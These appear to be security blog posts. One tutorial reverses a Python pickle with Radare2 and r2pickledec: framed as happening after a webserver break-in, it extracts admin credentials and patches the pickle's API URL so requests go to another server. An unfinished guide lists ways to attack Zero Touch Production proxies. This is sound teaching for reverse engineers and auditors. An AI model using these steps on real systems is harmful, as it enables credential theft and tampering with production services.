While some may argue that these challenges are reason enough to abandon remote work and return to the office, we believe that the benefits of remote work far outweigh any challenges we may face. At Doyensec, remote work allows us to hire talented individuals from all over the EU and US/Canada, offering a diverse and inclusive work environment. Remote work also allows for greater flexibility and work-life balance, which can result in happier and more productive employees.

In conclusion, while managing devices in a remote work environment can be challenging, we believe that the benefits of remote work make it worthwhile. At Doyensec, we have developed strategies to manage devices efficiently, and we continue to support remote work and its many benefits.

Reversing Pickles with r2pickledec

2023-06-01T00:00:00+02:00

R2pickledec is the first pickle decompiler to support all instructions up to protocol 5 (the current version). In this post we will go over what Python pickles are, how they work and how to reverse them with Radare2 and r2pickledec. An upcoming blog post will go even deeper into pickles and share some advanced obfuscation techniques.

What are pickles?

Pickles are the built-in serialization algorithm in Python. They can turn any Python object into a byte stream so it may be stored on disk or sent over a network. Pickles are notoriously dangerous. You should never unpickle data from an untrusted source. Doing so will likely result in remote code execution. Please refer to the documentation for more details.

Pickle Basics

Pickles are implemented as a very simple assembly language. There are only 68 instructions and they mostly operate on a stack. The instruction names are pretty easy to understand. For example, the instruction empty_dict will push an empty dictionary onto the stack.

The stack only allows access to the top item, or items in some cases. If you want to grab something else, you must use the memo. The memo is implemented as a dictionary with positive integer indexes. You will often see memoize instructions. Naively, the memoize instruction will copy the item at the top of the stack into the next index in the memo. Then, if that item is needed later, a binget n can be used to get the object at index n.

To learn more about pickles, I recommend playing with some pickles. Enable descriptions in Radare2 with e asm.describe = true to get short descriptions of each instruction. Decompile simple pickles that you build yourself, and see if you can understand the instructions.
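If you want a first look at the memo before opening r2, Python's standard `pickletools` module can list the instructions of a pickle without executing it. The small sketch below pickles a list holding the same dictionary twice, so the second reference is fetched from the memo. Note that `pickletools` prints opcode names in upper case (EMPTY_DICT, MEMOIZE, BINGET), while r2 shows them in lower case.

```python
import pickle
import pickletools

# The same dict object appears twice, so the pickler stores it once
# and reads it back from the memo for the second reference.
shared = {}
data = pickle.dumps([shared, shared], protocol=4)

# genops only parses the byte stream; it does not run the pickle.
opcode_names = [opcode.name for opcode, arg, pos in pickletools.genops(data)]
print(opcode_names)

# Loading is fine here only because we built this pickle ourselves.
restored = pickle.loads(data)
print(restored[0] is restored[1])
```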

Installing Radare2 and r2pickledec

For reversing pickles, our tool of choice is Radare2 (r2 for short). Package managers tend to ship really old r2 versions. In this case it’s probably fine, since I added the pickle arch to r2 a long time ago. But if you run into any bugs, I suggest installing from source.

In this blog post, we will primarily be using our R2pickledec decompiler plugin. I purposely wrote this plugin to only rely on r2 libraries. So if r2 works on your system, r2pickledec should work too. You should be able to install it with r2pm.

$ r2pm -U             # update package db
$ r2pm -ci pickledec  # clean install

You can verify everything worked with the following command. You should see the r2pickledec help menu.

$ r2 -a pickle -qqc 'pdP?' -
Usage: pdP[j]  Decompile python pickle
| pdP   Decompile python pickle until STOP, eof or bad opcode
| pdPj  JSON output
| pdPf  Decompile and set pick.* flags from decompiled var names

Reversing a Real pickle with Radare2 and r2pickledec

Let’s reverse a real pickle. One never reverses without some context, so let’s imagine you just broke into a webserver. The webserver is intended to allow employees of the company to perform privileged actions on client accounts. While poking around, you find a pickle file that is used by the server to restore state. What interesting things might we find in the pickle?

The pickle appears below base64 encoded. Feel free to grab it and play along at home.

$ base64 -i /tmp/blog2.pickle -b 64
gASVDQYAAAAAAACMCF9fbWFpbl9flIwDQXBplJOUKYGUfZQojAdzZXNzaW9ulIwR
cmVxdWVzdHMuc2Vzc2lvbnOUjAdTZXNzaW9ulJOUKYGUfZQojAdoZWFkZXJzlIwT
cmVxdWVzdHMuc3RydWN0dXJlc5SME0Nhc2VJbnNlbnNpdGl2ZURpY3SUk5QpgZR9
lIwGX3N0b3JllIwLY29sbGVjdGlvbnOUjAtPcmRlcmVkRGljdJSTlClSlCiMCnVz
ZXItYWdlbnSUjApVc2VyLUFnZW50lIwWcHl0aG9uLXJlcXVlc3RzLzIuMjguMpSG
lIwPYWNjZXB0LWVuY29kaW5nlIwPQWNjZXB0LUVuY29kaW5nlIwNZ3ppcCwgZGVm
bGF0ZZSGlIwGYWNjZXB0lIwGQWNjZXB0lIwDKi8qlIaUjApjb25uZWN0aW9ulIwK
Q29ubmVjdGlvbpSMCmtlZXAtYWxpdmWUhpR1c2KMB2Nvb2tpZXOUjBByZXF1ZXN0
cy5jb29raWVzlIwRUmVxdWVzdHNDb29raWVKYXKUk5QpgZR9lCiMB19wb2xpY3mU
jA5odHRwLmNvb2tpZWphcpSME0RlZmF1bHRDb29raWVQb2xpY3mUk5QpgZR9lCiM
CG5ldHNjYXBllIiMB3JmYzI5NjWUiYwTcmZjMjEwOV9hc19uZXRzY2FwZZROjAxo
aWRlX2Nvb2tpZTKUiYwNc3RyaWN0X2RvbWFpbpSJjBtzdHJpY3RfcmZjMjk2NV91
bnZlcmlmaWFibGWUiIwWc3RyaWN0X25zX3VudmVyaWZpYWJsZZSJjBBzdHJpY3Rf
bnNfZG9tYWlulEsAjBxzdHJpY3RfbnNfc2V0X2luaXRpYWxfZG9sbGFylImMEnN0
cmljdF9uc19zZXRfcGF0aJSJjBBzZWN1cmVfcHJvdG9jb2xzlIwFaHR0cHOUjAN3
c3OUhpSMEF9ibG9ja2VkX2RvbWFpbnOUKYwQX2FsbG93ZWRfZG9tYWluc5ROdWKM
CF9jb29raWVzlH2UdWKMBGF1dGiUjAVhZG1pbpSMD1BpY2tsZXMgYXJlIGZ1bpSG
lIwHcHJveGllc5R9lIwFaG9va3OUfZSMCHJlc3BvbnNllF2Uc4wGcGFyYW1zlH2U
jAZ2ZXJpZnmUiIwEY2VydJROjAhhZGFwdGVyc5RoFClSlCiMCGh0dHBzOi8vlIwR
cmVxdWVzdHMuYWRhcHRlcnOUjAtIVFRQQWRhcHRlcpSTlCmBlH2UKIwLbWF4X3Jl
dHJpZXOUjBJ1cmxsaWIzLnV0aWwucmV0cnmUjAVSZXRyeZSTlCmBlH2UKIwFdG90
YWyUSwCMB2Nvbm5lY3SUTowEcmVhZJSJjAZzdGF0dXOUTowFb3RoZXKUTowIcmVk
aXJlY3SUTowQc3RhdHVzX2ZvcmNlbGlzdJSPlIwPYWxsb3dlZF9tZXRob2RzlCiM
BVRSQUNFlIwGREVMRVRFlIwDUFVUlIwDR0VUlIwESEVBRJSMB09QVElPTlOUkZSM
DmJhY2tvZmZfZmFjdG9ylEsAjBFyYWlzZV9vbl9yZWRpcmVjdJSIjA9yYWlzZV9v
bl9zdGF0dXOUiIwHaGlzdG9yeZQpjBpyZXNwZWN0X3JldHJ5X2FmdGVyX2hlYWRl
cpSIjBpyZW1vdmVfaGVhZGVyc19vbl9yZWRpcmVjdJQojA1hdXRob3JpemF0aW9u
lJGUdWKMBmNvbmZpZ5R9lIwRX3Bvb2xfY29ubmVjdGlvbnOUSwqMDV9wb29sX21h
eHNpemWUSwqMC19wb29sX2Jsb2NrlIl1YowHaHR0cDovL5RoVymBlH2UKGhaaF0p
gZR9lChoYEsAaGFOaGKJaGNOaGROaGVOaGaPlGhoaG9ocEsAaHGIaHKIaHMpaHSI
aHUojA1hdXRob3JpemF0aW9ulJGUdWJoeH2UaHpLCmh7SwpofIl1YnWMBnN0cmVh
bZSJjAl0cnVzdF9lbnaUiIwNbWF4X3JlZGlyZWN0c5RLHnVijAdiYXNldXJslIwU
aHR0cHM6Ly9leGFtcGxlLmNvbS+UdWIu
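If you prefer to do the decoding step in Python, the sketch below decodes a base64 string and lists the imports a pickle would perform, without ever unpickling it. The `list_imports` helper is our own and deliberately naive: it pairs each `STACK_GLOBAL` with the two most recently pushed strings, so it will miss names that are fetched from the memo. A small pickle built on the spot stands in for the base64 text above.

```python
import base64
import collections
import pickle
import pickletools


def list_imports(pickle_bytes):
    """Naively list (module, name) pairs a pickle would import, without loading it."""
    strings = []  # string arguments seen so far, most recent last
    imports = []
    for opcode, arg, pos in pickletools.genops(pickle_bytes):
        if "UNICODE" in opcode.name:
            strings.append(arg)
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            imports.append((strings[-2], strings[-1]))
        elif opcode.name == "GLOBAL":
            # Older protocols carry "module name" directly in the opcode argument.
            module, name = arg.split(" ", 1)
            imports.append((module, name))
    return imports


# Stand-in for the base64 text of a pickle file.
encoded = base64.b64encode(pickle.dumps(collections.OrderedDict(a=1), protocol=4))
raw = base64.b64decode(encoded)
print(list_imports(raw))
```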

We decode the pickle and put it in a file, let’s call it test.pickle. We then open the file with r2. We also run x to see some hex and pd to print disassembly. If you ever want to know what an r2 command does, just run the command but append a ? to the end to get a help menu (e.g., pd?).

$ r2 -a pickle test.pickle
 -- .-. .- -.. .- .-. . ..---
[0x00000000]> x
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x00000000  8004 95bf 0500 0000 0000 008c 1172 6571  .............req
0x00000010  7565 7374 732e 7365 7373 696f 6e73 948c  uests.sessions..
0x00000020  0753 6573 7369 6f6e 9493 9429 8194 7d94  .Session...)..}.
0x00000030  288c 0768 6561 6465 7273 948c 1372 6571  (..headers...req
0x00000040  7565 7374 732e 7374 7275 6374 7572 6573  uests.structures
0x00000050  948c 1343 6173 6549 6e73 656e 7369 7469  ...CaseInsensiti
0x00000060  7665 4469 6374 9493 9429 8194 7d94 8c06  veDict...)..}...
0x00000070  5f73 746f 7265 948c 0b63 6f6c 6c65 6374  _store...collect
0x00000080  696f 6e73 948c 0b4f 7264 6572 6564 4469  ions...OrderedDi
0x00000090  6374 9493 9429 5294 288c 0a75 7365 722d  ct...)R.(..user-
0x000000a0  6167 656e 7494 8c0a 5573 6572 2d41 6765  agent...User-Age
0x000000b0  6e74 948c 1670 7974 686f 6e2d 7265 7175  nt...python-requ
0x000000c0  6573 7473 2f32 2e32 382e 3294 8694 8c0f  ests/2.28.2.....
0x000000d0  6163 6365 7074 2d65 6e63 6f64 696e 6794  accept-encoding.
0x000000e0  8c0f 4163 6365 7074 2d45 6e63 6f64 696e  ..Accept-Encodin
0x000000f0  6794 8c0d 677a 6970 2c20 6465 666c 6174  g...gzip, deflat
[0x00000000]> pd
            0x00000000      8004           proto 0x4
            0x00000002      95bf05000000.  frame 0x5bf
            0x0000000b      8c1172657175.  short_binunicode "requests.sessions" ; 0xd
            0x0000001e      94             memoize
            0x0000001f      8c0753657373.  short_binunicode "Session"  ; 0x21 ; 2'!'
            0x00000028      94             memoize
            0x00000029      93             stack_global
            0x0000002a      94             memoize
            0x0000002b      29             empty_tuple
            0x0000002c      81             newobj
            0x0000002d      94             memoize
            0x0000002e      7d             empty_dict
            0x0000002f      94             memoize
            0x00000030      28             mark
            0x00000031      8c0768656164.  short_binunicode "headers"  ; 0x33 ; 2'3'
            0x0000003a      94             memoize
            0x0000003b      8c1372657175.  short_binunicode "requests.structures" ; 0x3d ; 2'='
            0x00000050      94             memoize
            0x00000051      8c1343617365.  short_binunicode "CaseInsensitiveDict" ; 0x53 ; 2'S'
            0x00000066      94             memoize
            0x00000067      93             stack_global

From the above assembly it appears this file is indeed a pickle. We also see requests.sessions and Session as strings. This pickle likely imports requests and uses sessions. Let’s decompile it. We will run the command pdPf @0 ~.... This takes some explaining though, since it uses a couple of r2’s features.

pdPf - R2pickledec uses the pdP command (see pdP?). Adding an f causes the decompiler to set r2 flags for every variable name. This will make renaming variables and jumping to interesting locations easier.
@0 - This tells r2 to run the command at offset 0 instead of the current seek address. This does not matter now because our current offset defaults to 0. I just make this a habit in general to prevent mistakes when I am seeking around to patch something.
~.. - This is the r2 version of |less. It uses r2’s built in pager. If you like the real less better, you can just use |less. R2 commands can be piped to any command line program.

Once we execute the command, we will see a Python-like source representation of the pickle. The code is seen below, but snipped. All comments below were added by the decompiler.

## VM stack start, len 1
## VM[0] TOP
str_xb = "__main__"
str_x16 = "Api"
g_Api_x1c = _find_class(str_xb, str_x16)
str_x24 = "session"
str_x2e = "requests.sessions"
str_x42 = "Session"
g_Session_x4c = _find_class(str_x2e, str_x42)
str_x54 = "headers"
str_x5e = "requests.structures"
str_x74 = "CaseInsensitiveDict"
g_CaseInsensitiveDict_x8a = _find_class(str_x5e, str_x74)
str_x91 = "_store"
str_x9a = "collections"
str_xa8 = "OrderedDict"
g_OrderedDict_xb6 = _find_class(str_x9a, str_xa8)
str_xbc = "user-agent"
str_xc9 = "User-Agent"
str_xd6 = "python-requests/2.28.2"
tup_xef = (str_xc9, str_xd6)
str_xf1 = "accept-encoding"
...
str_x5c9 = "stream"
str_x5d3 = "trust_env"
str_x5e0 = "max_redirects"
dict_x51 = {
        str_x54: what_x16c,
        str_x16d: what_x30d,
        str_x30e: tup_x32f,
        str_x331: dict_x33b,
        str_x33d: dict_x345,
        str_x355: dict_x35e,
        str_x360: True,
        str_x36a: None,
        str_x372: what_x5c8,
        str_x5c9: False,
        str_x5d3: True,
        str_x5e0: 30
}
what_x5f3 = g_Session_x4c.__new__(g_Session_x4c, *())
what_x5f3.__setstate__(dict_x51)
str_x5f4 = "baseurl"
str_x5fe = "https://example.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x616 = g_Api_x1c.__new__(g_Api_x1c, *())
what_x616.__setstate__(dict_x21)
return what_x616

It’s usually best to start reversing at the end with the return line. That is what is being returned from the pickle. Hit G to go to the end of the file. You will see the following code.

str_x5f4 = "baseurl"
str_x5fe = "https://example.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x616 = g_Api_x1c.__new__(g_Api_x1c, *())
what_x616.__setstate__(dict_x21)
return what_x616

The what_x616 variable is getting returned. The what part of the variable indicates that the decompiler does not know what type of object this is. This is because what_x616 is the result of a g_Api_x1c.__new__ call. On the other hand, g_Api_x1c gets a g_ prefix. The decompiler knows this is a global, since it is from an import. It even adds the Api part in to hint at what the import is. The x1c and x616 indicate the offset in the pickle where the object was created. We will use that later to patch the pickle.
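To make the __new__ and __setstate__ pair more concrete, here is a minimal Python sketch of roughly what the unpickler does for those two lines. The Api class is a hypothetical stand-in (the real one lives in the target application), and newobj_and_build is an illustrative helper, not part of pickle or r2pickledec.

```python
def newobj_and_build(cls, state):
    """Roughly what NEWOBJ followed by BUILD does during unpickling."""
    obj = cls.__new__(cls)  # NEWOBJ with an empty argument tuple; __init__ is skipped
    setstate = getattr(obj, "__setstate__", None)
    if setstate is not None:
        setstate(state)  # BUILD calls __setstate__ when the class provides one
    else:
        obj.__dict__.update(state)  # otherwise the state dict is merged into __dict__
    return obj


class Api:  # hypothetical stand-in for __main__.Api
    def __init__(self):
        raise RuntimeError("__init__ is not called when unpickling")


api = newobj_and_build(Api, {"session": None, "baseurl": "https://example.com/"})
print(api.baseurl)
```

The point to take away is that the constructor never runs, so whatever sits in the state dictionary ends up on the object unchecked.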

Since we used flags, we can easily rename variables by renaming the flag. It might be helpful to rename the g_Api_x1c to make it easier to search for. Rename the flag with fr pick.g_Api_x1c pick.api. Notice, the flag will tab complete. List all flags with the f command. See f? for help.

Now run pdP @0 ~.. again. Instead of g_Api_x1c you will see api. If we search for its first use, you will find the below code.

str_xb = "__main__"
str_x16 = "Api"
api = _find_class(str_xb, str_x16)
str_x24 = "session"
str_x2e = "requests.sessions"
str_x42 = "Session"
g_Session_x4c = _find_class(str_x2e, str_x42)

Naively, _find_class(module, name) is equivalent to _getattribute(sys.modules[module], name)[0]. We can see the module is __main__ and the name is Api. So the api variable is just __main__.Api.
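As a rough illustration of that equivalence, the lookup can be written in a few lines of Python. This is a simplified sketch that assumes no custom Unpickler.find_class override and skips the compatibility name mapping used for older protocols.

```python
import importlib
import sys


def find_class(module, name):
    """Simplified version of the import-and-lookup done for a global reference."""
    importlib.import_module(module)  # make sure the module is loaded
    obj = sys.modules[module]
    for part in name.split("."):  # dotted names walk nested attributes
        obj = getattr(obj, part)
    return obj


ordered_dict = find_class("collections", "OrderedDict")
print(ordered_dict)
```

Because the module is imported as a side effect, simply referencing a global in a pickle is enough to load code from any importable module.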

In this snippet of code, we see the request session being imported. You may have noticed the baseurl field in the previous snippet of code. Looks like this object contains a session for making backend API requests. Can we steal something good from it? Googling for “requests session basic authentication” turns up the auth attribute. Let’s look for “auth” in our pickle.

str_x30e = "auth"
str_x315 = "admin"
str_x31d = "Pickles are fun"
tup_x32f = (str_x315, str_x31d)
str_x331 = "proxies"
dict_x33b = {}
...
dict_x51 = {
        str_x54: what_x16c,
        str_x16d: what_x30d,
        str_x30e: tup_x32f,
        str_x331: dict_x33b,
        str_x33d: dict_x345,
        str_x355: dict_x35e,
        str_x360: True,
        str_x36a: None,
        str_x372: what_x5c8,
        str_x5c9: False,
        str_x5d3: True,
        str_x5e0: 30
}

It might be helpful to rename variables for understanding, or run pdP > /tmp/pickle_source.py to get a .py file to open in your favorite text editor. In short though, the above code sets up the dictionary dict_x51 where the auth element is set to the tuple ("admin", "Pickles are fun").

We just stole the admin credentials!

Patching

Now I don’t recommend doing this on a real pentest, but let’s take things further. We can patch the pickle to use our own malicious webserver. We first need to find the current URL, so we search for “https” and find the following code.

str_x5f4 = "baseurl"
str_x5fe = "https://example.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x616 = api.__new__(g_Api_x1c, *())

So the baseurl of the API is being set to https://example.com/. To patch this, we seek to where the URL string is created. We can use the x5fe in the variable name to know where the variable was created, or we can just seek to the pick.str_x5fe flag. When seeking to a flag in r2 you can tab complete the flag. Notice the prompt changes its location number after the seek command.

[0x00000000]> s pick.str_x5fe
[0x000005fe]> pd 1
            ;-- pick.str_x5fe:
            0x000005fe      8c1468747470.  short_binunicode "https://example.com/" ; 0x600

Let’s overwrite this URL with https://doyensec.com/. The below Radare2 commands are commented so you can understand what they are doing.

[0x000005fe]> oo+ # reopen file in read/write mode
[0x000005fe]> pd 3 # double check what next instructions should be
            ;-- pick.str_x5fe:
            0x000005fe      8c1468747470.  short_binunicode "https://example.com/" ; 0x600
            0x00000614      94             memoize
            0x00000615      75             setitems
[0x000005fe]> r+ 1 # add one extra byte to the file, since our new URL is slightly longer
[0x000005fe]> wa short_binunicode "https://doyensec.com/"
INFO: Written 23 byte(s) (short_binunicode "https://doyensec.com/") = wx 8c1568747470733a2f2f646f79656e7365632e636f6d2f @ 0x000005fe
[0x000005fe]> pd 3     # double check we did not clobber an instruction
            ;-- pick.str_x5fe:
            0x000005fe      8c1568747470.  short_binunicode "https://doyensec.com/" ; 0x600
            0x00000615      94             memoize
            ;-- pick.what_x616:
            0x00000616      75             setitems
[0x000005fe]> pdP @0 |tail      # check that the patch worked
        str_x5e0: 30
}
what_x5f3 = g_Session_x4c.__new__(g_Session_x4c, *())
what_x5f3.__setstate__(dict_x51)
str_x5f4 = "baseurl"
str_x5fe = "https://doyensec.com/"
dict_x21 = {str_x24: what_x5f3, str_x5f4: str_x5fe}
what_x617 = g_Api_x1c.__new__(g_Api_x1c, *())
what_x617.__setstate__(dict_x21)
return what_x617
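The byte counts in the session above follow directly from how short_binunicode is encoded: one opcode byte (0x8c), one length byte, then the UTF-8 data. The sketch below rebuilds both instructions in Python. The helper name is made up for illustration, and the final check wraps the instruction in a tiny hand-written pickle rather than touching the original file.

```python
import pickle


def short_binunicode(text):
    """Encode a string as a SHORT_BINUNICODE instruction: 0x8c, length byte, UTF-8 data."""
    data = text.encode("utf-8")
    if len(data) > 0xFF:
        raise ValueError("SHORT_BINUNICODE only holds up to 255 bytes")
    return bytes([0x8C, len(data)]) + data


old = short_binunicode("https://example.com/")
new = short_binunicode("https://doyensec.com/")
print(len(old), len(new), new.hex())

# PROTO 4 + the string instruction + STOP is already a complete pickle.
print(pickle.loads(b"\x80\x04" + new + b"."))
```

The new instruction is 23 bytes against 22 for the old one, which is why the file had to grow by one byte with r+ 1 before writing.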

JSON and Automation

Imagine this is just the first of 100 files and you want to patch them all. Radare2 is easy to script with r2pipe. Most commands in r2 have a JSON variant by adding a j to the end. In this case, pdPj will produce an AST in JSON. This is complete with offsets. Using this you can write a parser that will automatically find the baseurl element of the returned api object, get the offset and patch it.

JSON can also be helpful without r2pipe. This is because r2 has a bunch of built-in features for dealing with JSON. For example, we can pretty print JSON with ~{}, but for this pickle it would produce 1492 lines of JSON. So better yet, use r2’s internal gron output with ~{=} and grep for what you want.

[0x000005fe]> pdPj @0 ~{=}https
json.stack[0].value[1].args[0].value[0][1].value[1].args[0].value[1][1].value[1].args[0].value[0][1].value[1].args[0].value[10][1].value[0].value = "https";
json.stack[0].value[1].args[0].value[0][1].value[1].args[0].value[8][1].value[1].args[0].value = "https://";
json.stack[0].value[1].args[0].value[1][1].value = "https://doyensec.com/";

Now we can use the provided JSON path to find the offset of the doyensec.com URL.

[0x00000000]> pdPj @0 ~{stack[0].value[1].args[0].value[1][1].value}
https://doyensec.com/
[0x00000000]> pdPj @0 ~{stack[0].value[1].args[0].value[1][1]}
{"offset":1534,"type":"PY_STR","value":"https://doyensec.com/"}
[0x00000000]> pdPj @0 ~{stack[0].value[1].args[0].value[1][1].offset}
1534
[0x00000000]> s `pdPj @0 ~{stack[0].value[1].args[0].value[1][1].offset}` ## seek to address using subcommand
[0x000005fe]> pd 1
            ;-- pick.str_x5fe:
            0x000005fe      8c1568747470.  short_binunicode "https://doyensec.com/" ; 0x600
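The same lookup can be done outside r2 once the JSON is in hand. The sketch below walks a nested structure and collects the offsets of string nodes that contain a given substring. Only the leaf shape (offset, type PY_STR, value) is taken from the output above; the surrounding sample_ast layout and the PY_OBJECT type name are simplified assumptions for the demo. With r2pipe, the dictionary would presumably come from cmdj("pdPj @0") instead.

```python
def find_string_offsets(ast, needle):
    """Return sorted offsets of PY_STR nodes whose value contains needle."""
    hits = []
    stack = [ast]
    while stack:
        node = stack.pop()
        if isinstance(node, dict):
            value = node.get("value")
            if node.get("type") == "PY_STR" and isinstance(value, str) and needle in value:
                hits.append(node["offset"])
            stack.extend(node.values())  # keep descending into nested values
        elif isinstance(node, list):
            stack.extend(node)
    return sorted(hits)


# Hand-built, simplified stand-in for the pdPj output (layout is an assumption).
sample_ast = {
    "stack": [
        {
            "type": "PY_OBJECT",
            "value": [
                {"offset": 1524, "type": "PY_STR", "value": "baseurl"},
                {"offset": 1534, "type": "PY_STR", "value": "https://doyensec.com/"},
            ],
        }
    ]
}
print(find_string_offsets(sample_ast, "https://"))
```

Searching by content rather than by a fixed JSON path is more forgiving when the 100 files do not all share the same layout.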

Don’t forget you can pipe to external commands. For example, pdPj |jq can be used to search the AST for different patterns, such as returning all objects where the type is PY_GLOBAL.

Conclusion

The r2pickledec plugin simplifies reversing of pickles. Because it is an r2 plugin, you get all the features of r2. We barely scratched the surface of what r2 can do. If you’d like to learn more, check out the r2 book. Be sure to keep an eye out for my next post where I will go into Python pickle obfuscation techniques.

Testing Zero Touch Production Platforms and Safe Proxies

2023-05-04T00:00:00+02:00

As more companies develop in-house services and tools to moderate access to production environments, the importance of understanding and testing these Zero Touch Production (ZTP) platforms grows ¹ ². This blog post aims to provide an overview of ZTP tools and services, explore their security role in DevSecOps, and outline common pitfalls to watch out for when testing them.

SRE? ZTP?
- Safe Proxies In Production
The safety & security roles of Safe Proxies
What does ZTP look like today
What to look for when auditing ZTP tools/services
Conclusions
References

SRE? ZTP?

“Every change in production must be either made by automation, prevalidated by software or made via audited break-glass mechanism.” – Seth Hettich, Former Production TL, Google

This terminology was popularized by Google’s DevOps teams and is the gold standard to this day. According to this picture, there are SREs, a selected group of engineers that can exclusively use their SSH production access to act when something breaks. But that access introduces reliability and security risks if they make a mistake or their accounts are compromised. To balance this risk, companies should automate the majority of the production operations while providing routes for manual changes when necessary. This is the basic reasoning behind what was introduced by the “Zero Touch Production” pattern.

Safe Proxies In Production

The “Safe Proxy” model refers to the tools that allow authorized persons to access or modify the state of physical servers, virtual machines, or particular applications. From the original definition:

At Google, we enforce this behavior by restricting the target system to accept only calls from the proxy through a configuration. This configuration specifies which application-layer remote procedure calls (RPCs) can be executed by which client roles through access control lists (ACLs). After checking the access permissions, the proxy sends the request to be executed via the RPC to the target systems. Typically, each target system has an application-layer program that receives the request and executes it directly on the system. The proxy logs all requests and commands issued by the systems it interacts with.

The safety & security roles of Safe Proxies

There are various outage scenarios prevented by ZTP (e.g., typos, cut/paste errors, wrong terminals, underestimating blast radius of impacted machines, etc.). On paper, it’s a great way to protect production from human errors affecting the availability, but it can also help to prevent some forms of malicious access. A typical scenario involves an SRE that is compromised or malicious and tries to do what an attacker would do with privileges. This could include bringing down or attacking other machines, compromising secrets, or scraping user data programmatically. This is why testing these services will become more and more important as the attackers will find them valuable and target them.

What does ZTP look like today

Many companies nowadays need these secure proxy tools to realize their vision, but they are all trying to reinvent the wheel in one way or another. This is because it’s an immature market and no off-the-shelf solutions exist. During the development, the security team is often included in the steering committee but may lack the domain-specific logic to build similar solutions. Another issue is that since usually the main driver is the DevOps team wanting operational safety, availability and integrity are prioritized at the expense of confidentiality. In reality, the ZTP framework development team should collaborate with SRE and security teams throughout the design and implementation phases, ensuring that security and reliability best practices are woven into the fabric of the framework and not just bolted on at the end.

Last but not least, these solutions are to this day suffering in their adoption rates and are subjected to lax interpretations (to a point where developers are the ones using these systems to access what they’re allowed to touch in production). These services are particularly juicy for both pentesters and attackers. It’s not an understatement to say that every actor compromising a box in a corporate environment should first look at these services to escalate their access.

What to look for when auditing ZTP tools/services

We compiled some of the most common issues we’ve encountered while testing ZTP implementations below:

A. Web Attack Surface

ZTP services often expose a web-based frontend for various purposes such as monitoring, proposing commands or jobs, and checking command output. These frontends are prime targets for classic web security vulnerabilities like Cross-Site Request Forgery (CSRF), Server-Side Request Forgery (SSRF), Insecure Direct Object References (IDORs), XML External Entity (XXE) attacks, and Cross-Origin Resource Sharing (CORS) misconfigurations. If the frontend is also used for command moderation, it presents an even more interesting attack surface.

B. Hooks

Webhooks are widely used in ZTP platforms due to their interaction with team members and on-call engineers. These hooks are crucial for the command approval flow ceremony and for monitoring. Attackers may try to manipulate or suppress any Pagerduty, Slack, or Microsoft Teams bot/hook notifications. Issues to look for include content spoofing, webhook authentication weaknesses, and replay attacks.
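As a reference point when reviewing webhook authentication, a receiver that resists spoofing and simple replays usually looks something like the sketch below. The signing scheme (timestamp, a dot, then the body, HMAC-SHA256) and the 300 second window are assumptions chosen for illustration; real providers each define their own format.

```python
import hashlib
import hmac
import time

MAX_SKEW_SECONDS = 300  # assumed acceptance window for the timestamp


def sign(secret, timestamp, body):
    """Compute the hex HMAC-SHA256 over "<timestamp>.<body>"."""
    message = str(timestamp).encode() + b"." + body
    return hmac.new(secret, message, hashlib.sha256).hexdigest()


def verify_webhook(secret, timestamp, body, signature, now=None):
    """Accept only fresh requests whose signature matches the body."""
    now = time.time() if now is None else now
    if abs(now - timestamp) > MAX_SKEW_SECONDS:
        return False  # stale or future-dated request, possibly a replay
    expected = sign(secret, timestamp, body)
    return hmac.compare_digest(expected, signature)  # constant-time comparison


secret = b"demo-secret"
signature = sign(secret, 1000, b'{"approve": false}')
print(verify_webhook(secret, 1000, b'{"approve": false}', signature, now=1010))
```

A timestamp window only narrows the replay opportunity. During a test, check whether the receiver also tracks a per-request identifier so the same approval cannot be submitted twice inside the window.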

C. Safe Centralization

Safety checks in ZTP platforms are usually evaluated centrally. A portion of the solution is often hosted independently for availability, to evaluate the rules set by the SRE team. It’s essential to assess the security of the core service, as exploiting or polluting its visibility can affect the entire infrastructure’s availability (what if the service is down? who can access this service?).

In a hypothetical attack scenario, if a rule is set to only allow reboots of a certain percentage of the fleet, can an attacker pollute the fleet status and make the hosts look alive? This can be achieved with ping reply spoofing or via MITM in the case of plain HTTP health endpoints. Under these premises, network communications must be Zero Trust too to defend against this.

D. Insecure Default Templates

The templates for the policy configuration managing the access control for services are usually provided to service owners. These can be a source of errors themselves. Users should be guided to make the right choices by providing templates or automatically generating settings that are secure by default. For a full list of the design strategies presented, see the “Building Secure and Reliable Systems” bible ³.

E. Logging

Inconsistent or excessive logging retention of command outputs can be hazardous. Attackers might abuse discrepancies in logging retention to access user data or secrets logged in a given command or its results.

F. Rate-limiting

Proper rate-limiting configuration is essential to ensure an attacker cannot change all production “at once” by themselves. The rate limiting configuration should be agreed upon with the team responsible for the mediated services.

G. ACL Ownership

Another pitfall is found in what provides the ownership or permission logic for the services. If SREs can edit membership data via the same ZTP service or via other means, an attacker can do the same and bypass the solution entirely.

H. Command Safeguards

Strict allowlists of parameters and configurations should be defined for commands or jobs that can be run. Similar to “living off the land binaries” (lolbins), if arguments to these commands are not properly vetted, there’s an increased risk of abuse.

I. Traceability and Scoping

A reason for the pushed command must always be requested by the user (who, when, what, WHY). Ensuring traceability and scoping in the ZTP platform helps maintain a clear understanding of actions taken and their justifications.

J. Scoped Access

The ZTP platform should have rules in place to detect not only if the user is authorized to access user data, but also which kind and at what scale. Lack of fine-grained authorization or scoping rules for querying user data increases the risk of abuse.

K. Different Interfaces, Different Requirements

ZTP platforms usually have two types of proxy interfaces: Remote Procedure Call (RPC) and Command Line Interface (CLI). The RPC proxy is used to run CLI on behalf of the user/service in production in a controlled way. Since the implementation varies between the two interfaces, looking for discrepancies in the access requirements or logic is crucial.

L. Service vs Global rules

The rule evaluation priority (Global over Service-specific) is another area of concern. In general, service rules should not be able to override global rules but only set stricter requirements.
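One way to picture the expected behavior is a merge where the stricter value always wins. The sketch below assumes every rule is a numeric upper limit (so lower means stricter) and uses made-up rule names; real platforms have richer rule types, so treat it as a mental model rather than an implementation.

```python
def effective_limits(global_rules, service_rules):
    """Combine rules so a service can tighten, but never loosen, a global limit."""
    merged = dict(global_rules)
    for name, value in service_rules.items():
        if name in merged:
            merged[name] = min(merged[name], value)  # lower is stricter for these limits
        else:
            merged[name] = value  # service-only rules add extra restrictions
    return merged


# Hypothetical rule names, for illustration only.
global_rules = {"max_reboot_percent": 10, "max_commands_per_hour": 100}
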